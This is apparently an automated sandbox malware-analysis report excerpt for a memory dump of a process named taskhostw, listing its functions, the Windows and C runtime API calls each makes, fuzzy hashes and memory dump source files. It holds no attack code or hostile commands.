GetTempPathW.KERNEL32(00000104,?), ref: 002199A1
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 002199B8

Strings

aut, xrefs: 002199B2

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 370ffa0c4c9c1ff72c92e561b9887c74e01a8acd8010c722bf1716cb94fd6f72
Instruction ID: cbed3eefd1edf530d8cfc1accba27cacfbda194f0ded204072fab8ef07261ddc
Opcode Fuzzy Hash: 370ffa0c4c9c1ff72c92e561b9887c74e01a8acd8010c722bf1716cb94fd6f72
Instruction Fuzzy Hash: 6AD05B7594030DABDB509B90FC0DF9B773CD704700F0002B1BE54910A1D97055948B91

Function 0022CBF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7a21fe2aa8b1e44ef61c0c95325808f273d322f8b7d2f87e338f1a03cf1bf76
Instruction ID: afb63e637f572e87771f2c884e49c3c4235ac30c767995842c323125de9b5d63
Opcode Fuzzy Hash: e7a21fe2aa8b1e44ef61c0c95325808f273d322f8b7d2f87e338f1a03cf1bf76
Instruction Fuzzy Hash: 0EF16570A18311AFC714DF68C480A6ABBE5FF88314F14892EF8999B351D771E956CF82

Function 001B43DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001B4401
Shell_NotifyIconW.SHELL32(00000000,?), ref: 001B44A6
Shell_NotifyIconW.SHELL32(00000001,?), ref: 001B44C3

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 277f236513ff12ce6ebab9c11e91d1cb230793cd24e1a7a6873020e2d687e2e9
Instruction ID: bf24866523b32e58b4e30442aead0a31ffe8b72e0832aa41d70e3793ff3fdb3c
Opcode Fuzzy Hash: 277f236513ff12ce6ebab9c11e91d1cb230793cd24e1a7a6873020e2d687e2e9
Instruction Fuzzy Hash: 513161709057118FD720DF24E8856DBBBF8FB59304F00492EF99A83252D7B1A954CB92

Function 001D588C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 001D58A3

Part of subcall function 001DA2EB: __NMSG_WRITE.LIBCMT ref: 001DA312
Part of subcall function 001DA2EB: __NMSG_WRITE.LIBCMT ref: 001DA31C

__NMSG_WRITE.LIBCMT ref: 001D58AA

Part of subcall function 001DA348: GetModuleFileNameW.KERNEL32(00000000,002733BA,00000104,?,00000001,00000000), ref: 001DA3DA
Part of subcall function 001DA348: ___crtMessageBoxW.LIBCMT ref: 001DA488

Part of subcall function 001D321F: ___crtCorExitProcess.LIBCMT ref: 001D3225
Part of subcall function 001D321F: ExitProcess.KERNEL32 ref: 001D322E

Part of subcall function 001D8CA8: __getptd_noexit.LIBCMT ref: 001D8CA8

RtlAllocateHeap.NTDLL(008D0000,00000000,00000001,00000000,?,?,?,001D0F53,?), ref: 001D58CF

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 6f0c645dcc3521e26421be4abbb87edbca10ea0fd1357cdb43ca9f056b0a9651
Instruction ID: 2f3fb9c6f9145f1eaf1d686451ef3dd7577dd7111adea5f7c4bfcfeca9053f80
Opcode Fuzzy Hash: 6f0c645dcc3521e26421be4abbb87edbca10ea0fd1357cdb43ca9f056b0a9651
Instruction Fuzzy Hash: 7F014136210B21EBD724677ABC42A2E735ADFA2360B00012BF501AB382CF708E409621

Function 0021994B Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 00219964
SetFileTime.KERNEL32(00000000,?,00000000,?,?,002195F1,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0021997A
CloseHandle.KERNEL32(00000000), ref: 00219981

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: def84aaa39bd304a453a0dba4f5587bb7f46653e68c828ff4bf7d60f66bdd145
Instruction ID: 6e2b80033afaa0da43e23c5065ecbe50dd6b05b07ed653a583177e7f40408c76
Opcode Fuzzy Hash: def84aaa39bd304a453a0dba4f5587bb7f46653e68c828ff4bf7d60f66bdd145
Instruction Fuzzy Hash: B1E08632540314B7DB211F54FC0DFDE7B58AB05760F104220FB58690E087B119619798

Function 00218DB6 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00218DC4

Part of subcall function 001D2ED5: HeapFree.KERNEL32(00000000,00000000), ref: 001D2EE9
Part of subcall function 001D2ED5: GetLastError.KERNEL32(00000000,?,001D9BA4), ref: 001D2EFB

_free.LIBCMT ref: 00218DD5
_free.LIBCMT ref: 00218DE7

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: da83f3a9c8313d5dba728f7a15bdec3741db116714464bd9b18197c9301ee2d0
Instruction ID: 3ede0245de42be925559522ad67d3c83e17e50e70c5d0110b39a056d5b9bcaab
Opcode Fuzzy Hash: da83f3a9c8313d5dba728f7a15bdec3741db116714464bd9b18197c9301ee2d0
Instruction Fuzzy Hash: 7AE012A161170643CA24697C7980ED313DC5F78361714081EF519D76C2DF74E8D18164

Function 001BAB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 001EFF5A

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: e02818e73d6560a63a0dca8d937cec0e0f371b5b02174f2aa789a66b4552d6ba
Instruction ID: 8344327136ffa5dd8261c8df13f21e0732255e966774b647e969348113d18766
Opcode Fuzzy Hash: e02818e73d6560a63a0dca8d937cec0e0f371b5b02174f2aa789a66b4552d6ba
Instruction Fuzzy Hash: 8A2258705083418FCB29DF14C494BAABBE1BF98304F55895DF99A8B362D771EC85CB82

Function 001B492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 001B4992

Part of subcall function 001D34EC: __lock.LIBCMT ref: 001D34F2
Part of subcall function 001D34EC: DecodePointer.KERNEL32(00000001,?,001B49A7,00207F9C), ref: 001D34FE
Part of subcall function 001D34EC: EncodePointer.KERNEL32(?,?,001B49A7,00207F9C), ref: 001D3509

Part of subcall function 001B4A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000,00000000,?,008FA450,?,001B49BA), ref: 001B4A73
Part of subcall function 001B4A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002,?,008FA450,?,001B49BA), ref: 001B4A88

Part of subcall function 001B3B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 001B3B7A
Part of subcall function 001B3B4C: IsDebuggerPresent.KERNEL32 ref: 001B3B8C
Part of subcall function 001B3B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,002752F8,002752E0,?,?), ref: 001B3BFD
Part of subcall function 001B3B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 001B3C81

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 001B49D2

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 4c2f0569c91908bcab8135ed682b816114105f990f6e796b614fd0e5bedc2bce
Instruction ID: 8243c40cb6c557789542dc694344a2ec28ed51ffb0469403095145be7997462d
Opcode Fuzzy Hash: 4c2f0569c91908bcab8135ed682b816114105f990f6e796b614fd0e5bedc2bce
Instruction Fuzzy Hash: 9A119D719143219FC310EF38EC4994AFBE8EF98710F00891EF559932B2DBB09585CB92

Function 001B5DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 001B5E27
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000), ref: 001EE0CC

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b7fae5b781fe6587b6297f18757e43045414e3dccdfcec5b577f4518e838e070
Instruction ID: cd7504e01ea028a9e07cfa485965c26b0ebb2052ad7236053fddf262a7d53b62
Opcode Fuzzy Hash: b7fae5b781fe6587b6297f18757e43045414e3dccdfcec5b577f4518e838e070
Instruction Fuzzy Hash: 4F018070244608BEF7250F24DC8AFA67A9DAB05768F108219FAE56A1E0C7B15E458B10

Function 001D0F36 Relevance: 3.0, APIs: 2, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 001D588C: __FF_MSGBANNER.LIBCMT ref: 001D58A3
Part of subcall function 001D588C: __NMSG_WRITE.LIBCMT ref: 001D58AA
Part of subcall function 001D588C: RtlAllocateHeap.NTDLL(008D0000,00000000,00000001,00000000,?,?,?,001D0F53,?), ref: 001D58CF

std::exception::exception.LIBCMT ref: 001D0F6C
__CxxThrowException@8.LIBCMT ref: 001D0F81

Part of subcall function 001D871B: RaiseException.KERNEL32(?,?,?,00269E78,00000000,?,?,?,?,001D0F86,?,00269E78,?,00000001), ref: 001D8770

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 9ded3fba06e4c27f2f5d938a979af0a4e0004eb9e332ef4c2bdc83cb9ec8f6c8
Instruction ID: d9d77d3081822bebbdbed275e5ea09ea79466ff87bbb8816771df02a9a7f1e10
Opcode Fuzzy Hash: 9ded3fba06e4c27f2f5d938a979af0a4e0004eb9e332ef4c2bdc83cb9ec8f6c8
Instruction Fuzzy Hash: B2F0F431804209A7CB25AB94EC01ADE7BAC9F14310F200467F908A6382DF71DAA4C2D1

Function 001D576D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 001D579C
__lock_file.LIBCMT ref: 001D57BD

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: b82b72e04695591df0f7ac0680c1cc7caae316723ff5515a173ed817b3871ce5
Instruction ID: 778ebb88b3412de2b707c908252884a95c43bf6bfd9428e8a4cad05704aa3693
Opcode Fuzzy Hash: b82b72e04695591df0f7ac0680c1cc7caae316723ff5515a173ed817b3871ce5
Instruction Fuzzy Hash: F501A731901609EBCF21AF698C0149F7B73BF90360F644217F9245B351D7358A21DF91

Function 001D5516 Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 001D8CA8: __getptd_noexit.LIBCMT ref: 001D8CA8

__lock_file.LIBCMT ref: 001D555B

Part of subcall function 001D6D8E: __lock.LIBCMT ref: 001D6DB1

__fclose_nolock.LIBCMT ref: 001D5566

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 3c0be49af23e2ab2e26c9b76ee19e97c491a283bfac75a2d3109cf523133be2a
Instruction ID: f992251d93832779b07ad048bf4f0f81af4b0b3c6b8835f24b27884b26dc88e9
Opcode Fuzzy Hash: 3c0be49af23e2ab2e26c9b76ee19e97c491a283bfac75a2d3109cf523133be2a
Instruction Fuzzy Hash: 04F0B431911A009AD7216F75980276E6BA36F51335F15820BF424AB3C1CB7C49419F52

Function 001B81C1 Relevance: 2.6, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,001B558F,?,?,?,?,?), ref: 001B81DA
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,001B558F,?,?,?,?,?), ref: 001B820D

Part of subcall function 001B78AD: _memmove.LIBCMT ref: 001B78E9

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: ByteCharMultiWide$_memmove
String ID:
API String ID: 3033907384-0
Opcode ID: 5ee62b657602c0dc0a4ab594b521daf1849f10a2d6469a08fbe5e0d1913eff66
Instruction ID: 53a4ce08aa411a44ed9e3596cf1676d8bee8b0f28901eb7fda81e7b44a09f8b3
Opcode Fuzzy Hash: 5ee62b657602c0dc0a4ab594b521daf1849f10a2d6469a08fbe5e0d1913eff66
Instruction Fuzzy Hash: 23016D71205504BFEB256B25ED4AFBB7B6DEF99760F10802AF905CE2D1DB21D800D671

Function 001BF3F0 Relevance: 1.7, APIs: 1, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5865f650b22a530acfd27975cd367d6f2961a14ad5c6bdd62bdab5afe6ec4846
Instruction ID: b48d48178bdd44152a2b041aa1da27dfa40963af81b40d4a6223e0a0fe91c957
Opcode Fuzzy Hash: 5865f650b22a530acfd27975cd367d6f2961a14ad5c6bdd62bdab5afe6ec4846
Instruction Fuzzy Hash: A061AD7060020A9FCB24EF64C881ABBB7F5EF49304F15857EE9169B291E771ED52CB50

Function 001C2123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 668953b766a9b5accf1abe7d27db4bd95f9f6de7f3c738a54f0064d9bd36ce93
Instruction ID: 2c366f4a31a639b8c9c6079dad004b8d77ee4b7951d305a3991d6ee114c737d1
Opcode Fuzzy Hash: 668953b766a9b5accf1abe7d27db4bd95f9f6de7f3c738a54f0064d9bd36ce93
Instruction Fuzzy Hash: 82517E34600604AFCF14EF64C995FAE77A6AFA5314F15806CF946AB392CB30ED01CB51

Function 001B5C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000), ref: 001B5CF6

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: dbd156c9bd3b82b48f48bf949b963f38b6fd4acb11efbce21c72aefb511617d4
Instruction ID: 3de59564fdec9e7d90e182e9716206e110ff3f9a5f443b38979fb970cf44dcb3
Opcode Fuzzy Hash: dbd156c9bd3b82b48f48bf949b963f38b6fd4acb11efbce21c72aefb511617d4
Instruction Fuzzy Hash: CE313A71A00B49ABCB18DF69C484BADBBB6FF48310F158629E81993750D771B960DB90

Function 001F0005 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 001F0010

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: ebeef6bd7a6d6b51c960aaea6185c78448ba7e2edaee8f20ac570a99efe50822
Instruction ID: 7e8ade4978d716dadbe83c7bd1c9b844738f263dbf633e10791af2cb3d1074f2
Opcode Fuzzy Hash: ebeef6bd7a6d6b51c960aaea6185c78448ba7e2edaee8f20ac570a99efe50822
Instruction Fuzzy Hash: CC413774508341CFDB25DF14C484B5ABBE1BF49318F1988ACE9998B762C772EC85CB52

Function 001B5B19 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 001B5B61

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 3767aed8bde2b6957c95f5e6b847ec4982c9a8e1ca3d8362503cbb36ecc64ede
Instruction ID: 890a86071b098a6b4e8c6c99297a8026a0e8fcfbee841c3c397989f1a6381d38
Opcode Fuzzy Hash: 3767aed8bde2b6957c95f5e6b847ec4982c9a8e1ca3d8362503cbb36ecc64ede
Instruction Fuzzy Hash: F7210531A00E18EBDB149F52F8857AE7FF9EF18350F21845AF486C5110EBB184D08745

Function 001B4F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 001B4D13: FreeLibrary.KERNEL32(00000000,?), ref: 001B4D4D

Part of subcall function 001D53CB: __wfsopen.LIBCMT ref: 001D53D6

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,002752F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 001B4F6F

Part of subcall function 001B4CC8: FreeLibrary.KERNEL32(00000000), ref: 001B4D02

Part of subcall function 001B4DD0: _memmove.LIBCMT ref: 001B4E1A

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
